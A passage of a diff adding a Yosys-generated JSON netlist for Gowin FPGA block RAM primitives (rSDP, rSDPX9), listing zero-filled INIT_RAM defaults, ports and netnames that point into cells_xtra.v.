52, 53, 54, 55, 56, 57, 58 ] + } + }, + "cells": { + }, + "netnames": { + "AD": { + "hide_name": 0, + "bits": [ 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:664.14-664.16" + } + }, + "BLKSEL": { + "hide_name": 0, + "bits": [ 20, 21, 22 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:665.13-665.19" + } + }, + "CE": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:661.12-661.14" + } + }, + "CLK": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:661.7-661.10" + } + }, + "DO": { + "hide_name": 0, + "bits": [ 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:666.15-666.17" + } + }, + "OCE": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:662.7-662.10" + } + }, + "RESET": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:663.7-663.12" + } + } + } + }, + "rSDP": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:354.1-431.10" + }, + "parameter_default_values": { + "BIT_WIDTH_0": "00000000000000000000000000100000", + "BIT_WIDTH_1": "00000000000000000000000000100000", + "BLK_SEL": "000", + "INIT_RAM_00": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_01": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_02": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_03": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_04": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_05": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_06": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_07": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_08": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_09": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0A": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0B": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0C": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0D": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0E": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0F": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_10": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_11": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_12": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_13": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_14": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_15": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_16": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_17": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_18": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_19": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1A": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1B": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1C": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1D": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1E": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1F": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_20": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_21": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_22": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_23": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_24": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_25": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_26": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_27": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_28": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_29": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2A": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2B": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2C": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2D": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2E": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2F": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_30": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_31": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_32": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_33": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_34": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_35": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_36": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_37": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_38": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_39": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3A": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3B": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3C": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3D": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3E": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3F": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "READ_MODE": "0", + "RESET_MODE": "SYNC" + }, + "ports": { + "CLKA": { + "direction": "input", + "bits": [ 2 ] + }, + "CEA": { + "direction": "input", + "bits": [ 3 ] + }, + "CLKB": { + "direction": "input", + "bits": [ 4 ] + }, + "CEB": { + "direction": "input", + "bits": [ 5 ] + }, + "OCE": { + "direction": "input", + "bits": [ 6 ] + }, + "RESETA": { + "direction": "input", + "bits": [ 7 ] + }, + "RESETB": { + "direction": "input", + "bits": [ 8 ] + }, + "ADA": { + "direction": "input", + "bits": [ 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22 ] + }, + "ADB": { + "direction": "input", + "bits": [ 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36 ] + }, + "DI": { + "direction": "input", + "bits": [ 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68 ] + }, + "BLKSEL": { + "direction": "input", + "bits": [ 69, 70, 71 ] + }, + "DO": { + "direction": "output", + "bits": [ 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103 ] + } + }, + "cells": { + }, + "netnames": { + "ADA": { + "hide_name": 0, + "bits": [ 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:427.14-427.17" + } + }, + "ADB": { + "hide_name": 0, + "bits": [ 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:427.19-427.22" + } + }, + "BLKSEL": { + "hide_name": 0, + "bits": [ 69, 70, 71 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:429.13-429.19" + } + }, + "CEA": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:424.13-424.16" + } + }, + "CEB": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:424.24-424.27" + } + }, + "CLKA": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:424.7-424.11" + } + }, + "CLKB": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:424.18-424.22" + } + }, + "DI": { + "hide_name": 0, + "bits": [ 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:428.14-428.16" + } + }, + "DO": { + "hide_name": 0, + "bits": [ 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:430.15-430.17" + } + }, + "OCE": { + "hide_name": 0, + "bits": [ 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:425.7-425.10" + } + }, + "RESETA": { + "hide_name": 0, + "bits": [ 7 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:426.7-426.13" + } + }, + "RESETB": { + "hide_name": 0, + "bits": [ 8 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:426.15-426.21" + } + } + } + }, + "rSDPX9": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:434.1-511.10" + }, + "parameter_default_values": { + "BIT_WIDTH_0": "00000000000000000000000000100100", + "BIT_WIDTH_1": "00000000000000000000000000100100", + "BLK_SEL": "000", + "INIT_RAM_00": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_01": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_02": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_03": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_04": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_05": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_06": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_07": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_08": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_09": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0A": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0B": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0C": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0D": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0E": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0F": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_10": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_11": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_12": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_13": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_14": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_15": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_16": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_17": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_18": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_19": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1A": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1B": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1C": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1D": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1E": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1F": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_20": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_21": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_22": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_23": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_24": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_25": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_26": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_27": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_28": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_29": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2A": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2B": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2C": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2D": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2E": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2F": 